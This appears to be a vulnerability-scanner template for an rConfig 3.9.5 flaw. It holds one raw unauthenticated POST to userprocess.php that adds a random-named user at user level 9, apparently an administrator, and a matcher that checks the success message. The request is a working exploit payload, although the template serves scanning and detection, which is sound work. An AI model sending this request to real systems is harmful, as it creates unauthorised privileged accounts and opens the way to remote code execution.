id: rconfig-rce

info:
  name: rConfig 3.9.5 - Remote Code Execution
  author: dwisiswant0
  severity: high
  tags: rconfig,rce
  description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint.
  reference:
    - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
    - https://www.exploit-db.com/exploits/48878

requests:
  - raw:
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
        Cookie: PHPSESSID={{randstr}}

        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="username"

        {{randstr}}
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="passconf"

        Testing1@
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="password"

        Testing1@
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="email"

        test@{{randstr}}.tld
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="editid"


        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="add"

        add
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="ulevelid"

        9
        --01b28e152ee044338224bf647275f8eb--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "User {{randstr}} successfully added to Database"

        part: body
      - type: status
        status:
          - 302